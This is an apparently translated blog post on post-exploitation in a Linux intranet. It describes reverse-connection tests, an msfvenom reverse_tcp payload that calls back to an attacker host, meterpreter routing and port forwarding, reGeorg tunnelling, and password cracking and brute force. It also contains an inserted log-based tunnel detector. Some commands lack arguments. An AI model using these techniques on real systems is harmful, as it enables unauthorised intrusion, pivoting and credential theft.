Playing with Linux systems: intranet penetration

Posted by barello at 2020-02-25

Some time ago I carried out a Linux intranet penetration test that was neither successful nor complete. It was unsuccessful because I did not obtain access to any other server on the intranet, and it was incomplete because I had to suspend the test for other reasons. Although this Linux intranet penetration is not a good teaching case, I decided to record the process, and in particular the overall approach, so that I do not forget it. There is a lot of material about intranet penetration online, and I read much of it before the test. The title highlights Linux because this test did not involve any Windows systems. The principles of Linux and Windows intranet penetration are similar, but the tools differ.

Collecting the target network environment

When we obtain a shell on a target intranet server, that is, on a compromised host (the "broiler", as the post calls it), the first thing to do is to collect information. In my opinion, one of the most important things to learn is the network environment of the compromised host.

Test environment

First, the server environment of this test:

The scenario assumed in this test: the compromised host runs a vulnerable web application, and an intruder has planted a webshell through it. The goal of the test: starting from the webshell on the compromised host, penetrate the servers in the intranet's 17 network segment.

What network information is collected, and how is it tested?

Now that I have a shell on the compromised host, which aspects of its network environment should I collect, and how do I test them? I think at least the following should be collected:

Note: connectivity mainly means whether the two sides can ping each other. Port access restriction means whether there is a bastion host or firewall at the target network boundary and whether it restricts inbound and outbound ports.

Port access restriction test

The ping test is not covered here; this section is mainly about how to test port access restrictions. The tools available are:

Before testing port access restrictions we need to understand the current network layout. In this test the attacker is on the Internet and the compromised host is on the intranet, so normally the attacker cannot directly reach a port on the compromised host (that would require the network border router to map the port).

Reverse connection test

To test port access restrictions, first use ncat to listen on a port on the attacker's machine:


ncat -l -p 9999

Then, on the compromised host, use a tool such as ncat or telnet to try to connect to it; I call this the reverse connection test.


ncat 110.xx.xx.xx 9999

Note: the listening port can be chosen arbitrarily, and you should try several different ports. If the compromised host can reach any port on the attacker, the target network boundary does not restrict outbound connections; knowing this is very useful for the port forwarding later.

Forward connection test

We can also listen on a port on the compromised host and try to connect to it from the attacker, using the compromised host's external IP address. The externally exposed web application must be reachable through an Internet IP or domain name; in this test that is not the real IP of the compromised host but the IP of the boundary network device, which maps its own web port (Internet IP) to the web port of the compromised host (intranet IP). I call this the forward connection test. The point of trying to connect to ports on the external address is that some careless administrators configure a full port mapping on the boundary device, so that any port listening on the compromised host is mapped to the same port on the boundary device; that is no different from the compromised host being directly on the Internet.

Collecting server information

Information gathering is the first step of a penetration test, and intranet penetration is no exception: the more server information is collected, the higher the chance of success.

View the system release and kernel

On Linux, the release information (which helps to pin down the kernel version) is shown as follows:

lsb_release -a

In general the first step after intrusion is privilege escalation, which can be done through a Linux kernel vulnerability. So check the kernel version first, then look up an exploit (exp) for that kernel and upload it to escalate privileges. Since this test does not cover privilege escalation, none was attempted. Also note that kernel privilege escalation carries a risk of crashing the machine, so operate carefully.

View the operating system bitness

On Linux, whether the system is 32-bit or 64-bit is shown as follows:


getconf LONG_BIT

Note: knowing whether the system is 32-bit or 64-bit matters when generating the MSF payload later.

Sensitive system information

Collect sensitive system information such as account passwords, logs, command history, SSH files, etc.

Sensitive web information

If the server hosts a web application, check the web directory for sensitive information, such as configuration files containing database connection credentials.

Intranet scanning

After information gathering, we can try to scan the intranet machines: host discovery, port scanning, ARP scanning, etc. Port scanning can be done with nmap, MSF and similar tools, but if these are not installed on the server there are usually three ways to get the effect of an intranet port scan. The first is to install scanning tools on the server, which I do not recommend because it is noisy and cumbersome (although uploading a Python port-scanning script, which needs no compilation or installation, is more convenient). The second is port forwarding, which forwards intranet ports of the server out to the Internet for scanning. The third is proxy scanning, which proxies the attacker machine, with its scanning tools, into the target intranet. Whether port forwarding or proxy scanning is used, the principle is to establish connectivity between the attacker (Internet) and the compromised host (intranet), so that the attacker can directly reach the intranet resources around the compromised host. This connection does not rely on the port-mapping function of the target's boundary device, so it differs from the connection created when the attacker accesses the compromised host's web service.

Port forwarding

To achieve the "direct" connection above, we need an intermediate bridge that carries data between the intranet and the Internet (between the compromised host and the attacker). There are many ways to build this bridge. The first that comes to mind is port forwarding: forwarding a port of the compromised host to a port on the attacker, so that accessing that port on the attacker is equivalent to accessing the port on the compromised host.

Port forwarding tools: lcx, meterpreter, etc. Their specific usage is introduced later under TCP port forwarding, HTTP forwarding, SSH forwarding, etc.

TCP port forwarding

Local forwarding: listen on ports 2222 and 3333 on the attacker; from the compromised host, connect to port 2222 of the attacker and forward the compromised host's own port 22. Forwarding connection principle:


[connection diagram] ... <--> port 22 of the compromised host

Note: connecting to port 3333 of the attacker is now equivalent to connecting to port 22 of the compromised host.

Remote forwarding: listen on ports 2222 and 3333 on the attacker; from the compromised host, connect to port 2222 of the attacker and forward port 22 of an intranet target server (this requires that the compromised host can reach port 22 of the target server). Forwarding connection principle:


[connection diagram] port 22 of the intranet target server <--> random high port of the compromised host

Note: connecting to port 3333 of the attacker is now equivalent to connecting to port 22 of the target server.

Note: from the connection flow above it is easy to see why port forwarding is hard to prevent: the port the attacker listens on is arbitrary and unpredictable, so an outbound port policy cannot be prepared in advance on the bastion host or firewall, unless the server is forbidden from reaching any external port at all (in practice, few environments restrict outbound port connections).

HTTP forwarding

Some security-conscious administrators apply a no-Internet-access policy to certain servers, so that the server cannot connect to any external port. Then ordinary TCP port forwarding does not work, because forwarding requires that the two sides can connect to each other. In this case HTTP forwarding can be used. Forwarding connection principle:


compromised host web port (80) <-- network boundary device port (80) <-- attacker random port

Note: the connection is possible here because of the web service on the server and the port-mapping function of the network boundary device.

Note: although the compromised host cannot reach any Internet port, as long as it exposes a web service to the outside it can still communicate with the outside world. This communication is limited to the web service port, however, and the compromised host does not talk to the attacker directly, only through the boundary device.

Proxy scanning of the intranet

The usage and principle of several kinds of port forwarding have been described above. Port forwarding is powerful but also limited: each forward carries only one port of one IP, which is not ideal for scanning. A better solution is proxy scanning. Its principle is similar to port forwarding in that a bridge is built, but the bridge is usually not a single port; it is a shell or session.

Proxy scanning can also be divided into TCP proxy scanning and HTTP proxy scanning.

HTTP proxy forwarding

If the target server has a web system, you can use reGeorg together with proxychains. Download both tools, upload the reGeorg tunnel file into the website directory on the compromised host, and on the attacker run:


python -p 2333 -u

Then edit the proxychains.conf configuration file:

vim /etc/proxychains.conf (on macOS, ~/.proxychains/proxychains.conf; create it if it does not exist)

On the last line add a socks5 entry for port 2333 (the same port reGeorg listens on).

Finally, when the attacker runs a scanning tool, prefix the command with proxychains4, for example:


proxychains4 nmap -sT -Pn -n

Note: this scheme works even when both the attacker and the compromised host are inside their own intranets. The attacker only needs to reach the HTTP service of the target server, and all traffic is forwarded through that HTTP service (which is slower).
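As an added defensive example (not from the original post): a detector over constructed web-server access-log lines that flags what the HTTP forwarding above looks like from the server side, i.e. one client driving a single server-side script at a steady rate with almost nothing but POST requests. The thresholds and the /uploads/tunnel.php path are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log line; only the fields the detector needs are captured.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
                      r'(?P<status>\d{3}) (?P<size>\d+|-)')
SCRIPT_EXT = (".php", ".jsp", ".jspx", ".aspx", ".ashx", ".asp")

# Assumed thresholds: a browser does not hammer one server-side script like this.
MIN_REQUESTS = 20        # requests from one client to one script path ...
MIN_RATE = 0.5           # ... at this many requests per second, on average
MIN_POST_RATIO = 0.8     # tunnels carry their payload in POST bodies

def parse_log(lines):
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        yield (m.group("ip"), m.group("url").split("?", 1)[0], m.group("method"),
               datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"))

def tunnel_candidates(lines):
    stats = defaultdict(lambda: {"n": 0, "post": 0, "first": None, "last": None})
    for ip, path, method, ts in parse_log(lines):
        if not path.lower().endswith(SCRIPT_EXT):
            continue                                  # static files cannot host a tunnel script
        s = stats[(ip, path)]
        s["n"] += 1
        s["post"] += method == "POST"
        s["first"] = ts if s["first"] is None else min(s["first"], ts)
        s["last"] = ts if s["last"] is None else max(s["last"], ts)
    hits = []
    for (ip, path), s in stats.items():
        span = max((s["last"] - s["first"]).total_seconds(), 1.0)
        if s["n"] >= MIN_REQUESTS and s["n"] / span >= MIN_RATE and s["post"] / s["n"] >= MIN_POST_RATIO:
            hits.append((ip, path, s["n"], round(s["n"] / span, 2)))
    return hits

# Constructed sample (not a real log): two ordinary visits, then one client driving a
# script dropped into the upload directory at about one request per second.
SAMPLE_LOG = [
    '198.51.100.4 - - [25/Feb/2020:10:00:00 +0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [25/Feb/2020:10:00:03 +0800] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
] + [
    f'203.0.113.7 - - [25/Feb/2020:10:01:{i:02d} +0800] "POST /uploads/tunnel.php HTTP/1.1" 200 12 "-" "python-requests/2.22.0"'
    for i in range(40)
]

for ip, path, n, rate in tunnel_candidates(SAMPLE_LOG):
    print(f"{ip} -> {path}: {n} requests, {rate} req/s, mostly POST")
```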

TCP proxy forwarding

Idea: have the compromised host send a meterpreter shell back to the attacker through a Metasploit payload, then set routes through the meterpreter session, so that the attacker can directly scan the network segment where the compromised host sits (this also works across segments).

Generating the MSF payload

Generate the payload:


msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=8000 -f elf > shell_8000.elf

Because the attacker cannot reach ports on the compromised host but the compromised host can reach ports on the attacker, a reverse-connecting payload is generated.

Reverse shell

The attacker runs msfconsole, uses the exploit/multi/handler module and sets the payload to linux/x86/meterpreter/reverse_tcp, the same payload used to generate the executable. LPORT is set to the port the payload will connect back to. Once run, the handler listens on that port on the attacker and waits for the callback. Now upload shell_8000.elf to the compromised host, make it executable and run it; it connects to the port the attacker is listening on, and the attacker obtains a meterpreter shell.

Route setup

The previous step gave us a session between the attacker and the compromised host. Check the compromised host's networks:


run get_local_subnets

Add a route:


run autoroute -s

View the routes:


run autoroute -p

Generally, setting the route here is enough, but sometimes it works inside meterpreter and fails in msf, in which case you can set it again in msf (as long as the meterpreter session is still alive): background the session, return to msf and add the routes. View the routes; here is the result after adding them. The route add command:



msf exploit(handler) > route add 12

msf exploit(handler) > route add 12

Note: 12 is the session ID. Since we need to reach the 17 segment, the route for the 17 segment is added here.

Note: the two routes above mean that when the attacker wants to reach resources in the 17 or 16 segment, the next hop is session 12. I will not go into what the hop after that is; the point is that the attacker can now reach intranet resources.

Forwarding connection principle:


[connection diagram] on the attacker side the bridge is not a port but a route

TCP global proxy forwarding

With the settings above, intranet resources can be reached from within msf, but only from msf. For other tools to use the proxy, a global proxy is needed: use the socks4a module of the Metasploit framework (auxiliary/server/socks4a) together with proxychains. Usage is the same as for the HTTP proxy.

Note: this proxy is a TCP proxy, not an HTTP proxy. Therefore at least one of the target server and the attacker must be on a public network; otherwise the payload cannot connect back and no meterpreter shell is obtained.

For Metasploit usage, refer to the Metasploit article.

Port scanning tools

For TCP proxy forwarding, Metasploit is recommended, so that the many scanning modules built into MSF can be used directly. Scanning modules:

In addition, nmap and other scanning tools can be used together with the TCP global proxy forwarding.

Attacking port 22

After the intranet scan reveals open ports, we can first try servers with port 22 open. There are two approaches: read plaintext passwords found on the compromised host and try to log in with them, or brute-force logins with a dictionary.

Trying the hashes

If our privileges allow, we can read the contents of /etc/shadow, but they are hashed, so we can try to crack them with tools.

Note: on Windows, mimikatz can be used.

Note: obtaining plaintext Linux account passwords is very important, because an intranet usually has only a few administrators and different servers may share the same password, so the passwords obtained from one server can be tried against other intranet servers with port 22 open.

Dictionary brute force

There is not much to say about this; it mainly depends on the quality of the dictionary and whether anti-brute-force lockouts are in place. Tools:

Attacking other ports

Besides port 22, ports 21 (FTP), 3306 (MySQL), 1433 (MSSQL), etc. can be brute-forced. What about other ports, such as 445 and 443? These can be attacked through their corresponding vulnerabilities: scan with Nessus, then use the matching MSF modules against the vulnerabilities found.

Attacking web services

Besides the ports above, there is a special class of port: web service ports such as 80, 443, 8000 and up. Since web applications run on these ports and web applications are weak points, we can focus on finding intranet servers with web services and penetrate their web applications following the usual web penetration testing process.

Port forwarding revisited

Port forwarding was introduced earlier, but I did not use it in the scanning phase. Is port forwarding useless in intranet penetration? Not at all. The exploitation stage after intranet scanning is where port forwarding really comes into its own: we can forward a single port of a vulnerable server and exploit it separately. On Windows, lcx can forward port 3389; on Linux, port 22 can likewise be forwarded. Even better, forward port 80 so that intranet web services can be accessed locally, continuing the web penetration pattern and expanding the attack surface.

Port forwarding with meterpreter

In the meterpreter shell, type:


meterpreter > portfwd add -l 55555 -r -p 3306

Note: this forwards port 3306 of the intranet server to port 55555 on the local (attacker) machine; we can then run mysql locally with -u root -P 55555 -p, with -h pointing at the local forwarded port, to log in to the intranet server's MySQL. Other ports such as SSH and FTP work the same way. This process resembles the MSF proxy.


Forward port 22 of the compromised host to port 2222 on the attacker and look at the connections. Port 2222 is listening on the attacker and is connected to a high port on the attacker itself; port 22 of the compromised host is likewise connected to a high port on the compromised host. How are the two high ports on the two servers connected? I think it must be through the meterpreter session. The meterpreter session therefore acts as a middleman, delivering messages that could not otherwise be delivered.

lcx port forwarding

On the attacker:


lcx -listen 2222 3333 (2222 is the forwarding port, 3333 is any unoccupied local port)

On the compromised host:


lcx -slave 2222 3389 (arguments: the attacker's external IP, then 2222, the forwarding port, then the compromised host's internal IP, then 3389, the remote desktop port)

Sniffing the intranet

On Windows, Cain can be used; on Linux, MSF. In general, though, it is better not to sniff the intranet, because it generates a lot of activity and may disrupt the network.

Linux intranet security recommendations

Having described so many intranet penetration techniques, by convention I should offer some suggestions for building intranet security. These are only my personal opinions; feel free to leave a comment to discuss them.
